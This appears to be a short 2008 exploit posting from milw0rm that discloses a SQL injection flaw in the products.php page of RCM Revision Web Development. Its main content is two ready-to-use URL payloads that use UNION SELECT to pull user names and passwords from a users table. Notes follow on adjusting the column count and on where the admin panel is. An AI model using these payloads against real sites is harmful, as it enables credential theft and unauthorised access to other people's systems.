39 lines
No EOL
1,017 B
Text
39 lines
No EOL
1,017 B
Text
##########################################################
|
|
#
|
|
# RCM Revision Web Development (products.php) SQL Injection Vulnerability
|
|
#
|
|
# by D3m0n a.k.a Niiub
|
|
#
|
|
# Home: www.bl4ck-b0x.info
|
|
#
|
|
# niiub[at]bl4ck-b0x.info
|
|
#
|
|
##########################################################
|
|
|
|
|
|
##########################################################
|
|
|
|
Exploit:
|
|
|
|
products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name,
|
|
user_password),6%20from%20users/*
|
|
|
|
OR
|
|
|
|
/gr/products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name,
|
|
user_password),6%20from%20users/*
|
|
|
|
##########################################################
|
|
|
|
Note: There can by diffrent number of Table, you have to search.
|
|
|
|
Note2: The admin Panel is www.site.com/admin/ but i can't login with the
|
|
Password and Login name from the SQL Injection. :(
|
|
|
|
##########################################################
|
|
|
|
Greetz: dun - sid_psycho - Kacper - Str0ke
|
|
|
|
###########################################################
|
|
|
|
# milw0rm.com [2008-06-30] |